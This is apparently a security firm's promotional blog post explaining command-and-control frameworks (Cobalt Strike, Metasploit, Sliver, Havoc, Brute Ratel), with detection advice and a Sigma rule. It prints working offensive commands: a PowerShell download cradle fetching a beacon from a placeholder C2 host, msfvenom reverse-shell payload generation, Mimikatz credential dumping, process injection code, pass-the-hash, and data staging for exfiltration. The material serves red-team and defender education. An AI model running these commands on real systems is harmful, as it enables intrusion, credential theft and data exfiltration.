Introduction to C2 Frameworks

In modern cyberattacks, breaking into a system is only the beginning. What happens next, how attackers maintain control, move laterally, and exfiltrate data, is where Command and Control (C2) frameworks come into play. Whether you are a penetration tester, a blue teamer trying to understand attacker behavior, or a security professional building defenses, understanding C2 frameworks is non-negotiable.

This blog breaks down what C2 frameworks are, how they work, the most popular tools in use today, and what defenders need to know to detect and disrupt them.

What Is a C2 Framework?

A Command and Control (C2) framework is a suite of tools that allows an attacker or red team operator to communicate with compromised systems (called "agents" or "implants") after initial access has been achieved. Think of it as the infrastructure that keeps an attacker in the driver's seat even after the initial exploit has run.

The C2 server acts as the mothership. Compromised machines "beacon" back to it at regular intervals, waiting for instructions. Those instructions can range from running a command, downloading additional payloads, escalating privileges, pivoting to internal systems, or exfiltrating sensitive data.

Why C2 Frameworks Matter in Penetration Testing

C2 frameworks are central to realistic penetration testing engagements. Without simulating post-exploitation behavior, a pentest is incomplete. Real adversaries do not just pop a shell and leave; they persist, they pivot, they exfiltrate. If your pentest does not replicate that behavior, critical detection gaps in your environment will go unnoticed.

If your organization wants to know how it holds up against a real-world intrusion, including post-exploitation, lateral movement, and data exfiltration scenarios, Redfox Cybersecurity's penetration testing services are built to simulate exactly that.

How C2 Communication Works

Understanding the communication model is key to both operating and detecting C2 frameworks.

The Beacon Mechanism

After an implant is dropped on a target system, it does not sit idle waiting for a connection. Instead, it periodically reaches out to the C2 server in a pattern called beaconing. This keeps the communication channel alive while avoiding constant network noise that might trigger alerts.

A typical beacon cycle works like this:

1. The implant executes on the target host.
2. It resolves the C2 server's address (via IP, domain, or redirector).
3. It sends an HTTP/HTTPS request (or DNS query, or SMB pipe, depending on the protocol).
4. The C2 server responds with a task or a "nothing to do" reply.
5. The implant sleeps for a configured interval and repeats.

Common C2 Communication Channels

Modern C2 frameworks are built to blend in with normal traffic. The most common channels include:

HTTP/HTTPS: The most widely used. Implants make web requests that mimic legitimate browser traffic, often using malleable profiles to customize HTTP headers, cookies, and URIs.

DNS: Commands are tunneled through DNS queries and responses. Extremely stealthy because DNS traffic is rarely blocked or deeply inspected.

SMB (Server Message Block): Used for lateral movement within a network. One compromised host acts as a proxy for others that cannot reach the internet.

ICMP: Commands encoded into ping packets. Less common but effective in environments where other traffic is restricted.

Custom Protocols: Advanced frameworks allow operators to build entirely custom communication protocols.

The Most Widely Used C2 Frameworks

Cobalt Strike

Cobalt Strike is arguably the most well-known commercial C2 framework in existence. Developed by Raphael Mudge and later acquired by HelpSystems (now Fortra), it is widely used by red teams and, unfortunately, threat actors who have obtained cracked versions.

Key Features:

• Beacon payload with support for HTTP, HTTPS, DNS, and SMB channels
• Malleable C2 profiles for traffic obfuscation
• Post-exploitation modules including credential harvesting, keylogging, and screenshot capture
• Team server for collaborative red team operations
• BOF (Beacon Object Files) for running custom code in-memory

Example: Generating a Stageless HTTPS Beacon

# On the Cobalt Strike team server (Linux)
./teamserver <C2_IP> <password> /path/to/malleable_profile.profile

# In the Cobalt Strike GUI:
# Attacks > Packages > Windows Executable (S)
# Select HTTPS listener, output: EXE, check "Use x64"


Example: Spawning a Beacon via PowerShell One-Liner

powershell -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString('http://<C2_IP>/beacon.ps1'))"


Example: Running a BOF to Enumerate Domain Admins

# In the Cobalt Strike console (beacon context)
beacon> execute-assembly /opt/tools/SharpView.exe Get-DomainGroupMember -Identity "Domain Admins"


Metasploit Framework

Metasploit is the most widely used open-source penetration testing framework. While it is often associated with exploitation, its post-exploitation capabilities through Meterpreter make it a fully functional C2 platform.

Example: Setting Up a Meterpreter Reverse HTTPS Listener

msfconsole

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST <your_IP>
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > run -j


Example: Generating a Meterpreter Payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_https \
 LHOST=<C2_IP> LPORT=443 \
 -f exe -o payload.exe


Example: Post-Exploitation with Meterpreter

meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/windows/gather/credentials/credential_collector


Sliver

Sliver is an open-source C2 framework developed by Bishop Fox. It has quickly become a go-to alternative to Cobalt Strike for red teams, offering modern features without the commercial price tag.

Example: Starting the Sliver Server and Generating an Implant

# Start Sliver server
sliver-server

# Generate a beacon implant
sliver > generate beacon \
 --http https://<C2_IP>:443 \
 --os windows \
 --arch amd64 \
 --save /tmp/beacon.exe

# Start an HTTPS listener
sliver > https --lhost <C2_IP> --lport 443


Example: Interacting with a Sliver Session

sliver > sessions
sliver > use <session_id>
sliver (session) > info
sliver (session) > shell
sliver (session) > execute-assembly /opt/tools/Seatbelt.exe -group=system


Havoc

Havoc is a newer, open-source C2 framework that has gained significant traction in the red team community. It offers a modern GUI, encrypted communication, and support for Beacon Object Files.

Example: Starting the Havoc Teamserver

cd /opt/Havoc
./havoc server --profile ./profiles/havoc.yaotl -v


Example: Generating a Havoc Demon Payload

# In the Havoc GUI:
# Payloads > Generate > Demon
# Set Listener: HTTPS
# Format: Windows EXE
# Sleep: 5s, Jitter: 20%


Brute Ratel C4 (BRc4)

Brute Ratel is a commercial adversary simulation platform built specifically to evade EDR solutions. It is designed with real-world threat actor TTPs (Tactics, Techniques, and Procedures) in mind and is frequently abused in the wild by nation-state actors.

Example: BRc4 Badger Profile Configuration (YAML)

network:
 host: <C2_IP>
 port: 443
 protocol: https
 sleep: 10
 jitter: 30
badger:
 arch: x64
 format: exe
 indirect_syscalls: true
 etw_patch: true


Key C2 Concepts Every Security Professional Should Know

Redirectors

Operating a C2 server directly exposes its IP address to defenders. Redirectors, typically cloud-based proxies or CDN nodes, forward traffic from implants to the actual team server. This makes attribution harder and keeps the real C2 infrastructure hidden.

Implant --> Redirector (CDN/VPS) --> Team Server


Setting up a simple Apache redirector:

# Enable mod_rewrite and mod_proxy
a2enmod rewrite proxy proxy_http

# .htaccess rule to forward beacon traffic
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/beacon.*$
RewriteRule ^(.*)$ https://<TEAM_SERVER_IP>/$1 [P,L]


Malleable Profiles and Traffic Obfuscation

One of the most powerful evasion techniques is making C2 traffic look like legitimate web traffic. Cobalt Strike's malleable C2 profiles allow operators to configure HTTP headers, URIs, cookies, and response bodies to mimic real services like Microsoft Teams, OneDrive, or Amazon AWS.

# Example malleable profile snippet mimicking Microsoft Graph API
http-get {
   set uri "/v1.0/me/messages";
   client {
       header "Accept" "application/json";
       header "User-Agent" "Microsoft Graph Client";
       metadata { base64url; prepend "graph_token="; header "Authorization"; }
   }
}


In-Memory Execution and Process Injection

Modern C2 implants rarely write to disk. Instead, they execute entirely in memory using techniques like:

Process Injection:

# Inject shellcode into a remote process using PowerShell
$process = Get-Process explorer | Select-Object -First 1
$handle = OpenProcess(0x1F0FFF, $false, $process.Id)
$mem = VirtualAllocEx($handle, [IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
WriteProcessMemory($handle, $mem, $shellcode, $shellcode.Length, [ref]0)
CreateRemoteThread($handle, [IntPtr]::Zero, 0, $mem, [IntPtr]::Zero, 0, [IntPtr]::Zero)


Reflective DLL Injection: Loads a DLL from memory without touching disk, bypassing many AV solutions.

Detecting C2 Activity: A Defender's Perspective

Understanding how to detect C2 traffic is just as important as knowing how to use these frameworks. Key detection strategies include:

Network-Level Detection

• Monitor for regular, periodic outbound connections (beaconing patterns). Tools like RITA (Real Intelligence Threat Analytics) are built to detect this.
• Flag unusual DNS query volumes or queries to newly registered domains.
• Inspect TLS certificates for self-signed or suspicious issuers.
• Look for HTTP connections with abnormal header ordering or missing standard browser headers.

Endpoint Detection

• Flag processes spawning from unusual parents (e.g., Word.exe spawning powershell.exe).
• Monitor for process injection via API calls like VirtualAllocEx, WriteProcessMemory, CreateRemoteThread.
• Detect in-memory .NET assembly loading.
• Watch for credential access patterns: LSASS reads, SAM registry access.

SIEM Detection Rules (Sigma Example)

title: Suspicious PowerShell Encoded Command
status: experimental
logsource:
   category: process_creation
   product: windows
detection:
   selection:
       Image|endswith: '\powershell.exe'
       CommandLine|contains:
           - '-EncodedCommand'
           - '-enc '
           - '-ec '
   condition: selection
falsepositives:
   - Legitimate admin scripts
level: medium


Understanding attacker behavior at this level is exactly what separates a checkbox compliance exercise from a real security assessment. Redfox Cybersecurity conducts adversary simulation engagements that replicate full attack chains, from initial access through C2 establishment, lateral movement, and data exfiltration, so your detection capabilities are tested against realistic scenarios.

MITRE ATT&CK Mapping for C2 Techniques

C2 frameworks directly map to several MITRE ATT&CK techniques. Every red team report should reference these:

TechniqueATT&CK IDDescriptionCommand and Control via HTTPT1071.001Beaconing over HTTP/HTTPSDNS C2T1071.004Commands tunneled via DNSProcess InjectionT1055Code injected into remote processesEncrypted ChannelT1573C2 traffic encrypted with TLSIngress Tool TransferT1105Downloading additional tools post-accessScheduled Task PersistenceT1053.005Maintaining access via task schedulerCredential DumpingT1003Extracting hashes and plaintext creds

Mapping your findings to ATT&CK is critical for communicating risk to stakeholders and aligning remediation to known threat actor behaviors.

Red Team Operations: Putting It All Together

A realistic red team engagement using a C2 framework typically follows this kill chain:

Phase 1: Initial AccessDeliver a payload via phishing, drive-by download, or exploitation of an external vulnerability.

Phase 2: Establish C2The payload executes, beacons back to the C2 server through a redirector, and a session is established.

Phase 3: Discovery

# Enumerate domain info via Seatbelt
execute-assembly /opt/Seatbelt.exe -group=system,user,remote
# Network discovery
shell net view /domain
shell nltest /dclist:<domain>


Phase 4: Credential Access

# Dump credentials from LSASS using Mimikatz via C2
execute-assembly /opt/Mimikatz.exe "sekurlsa::logonpasswords" "exit"


Phase 5: Lateral Movement

# Pass-the-hash lateral movement
shell wmic /node:<target_IP> /user:<domain>\<user> /password:<NTLM_hash> process call create "cmd.exe /c <command>"


Phase 6: Exfiltration Simulation

# Compress and exfil a sample data set to demonstrate impact
shell 7z a -tzip C:\Users\Public\data.zip C:\Users\<user>\Documents\*.xlsx
download C:\Users\Public\data.zip


If your organization has never been put through a full-chain engagement like this, your incident response team is operating without critical data. Redfox Cybersecurity's red team and penetration testing services deliver these engagements with detailed reporting, MITRE ATT&CK mapping, and actionable remediation guidance tailored to your environment.

Wrapping Up

C2 frameworks are the backbone of post-exploitation operations, both for legitimate red teams and real-world threat actors. Tools like Cobalt Strike, Sliver, Havoc, and Metasploit give operators granular control over compromised systems, enabling sophisticated attack scenarios that test defenses far beyond what automated scanners can achieve.

For defenders, understanding how these frameworks operate is the first step toward building detections that actually work. For organizations, commissioning a realistic adversary simulation is the only way to know whether those detections hold up under pressure.

If you are ready to find out how your environment performs against a real C2-based attack scenario, Redfox Cybersecurity is ready to run that test. From web application penetration testing and network assessments to full red team operations, the team at Redfox Cybersecurity delivers engagements that produce real answers, not just green checkmarks.

Take the next step. Explore Redfox Cybersecurity's services and book your assessment today.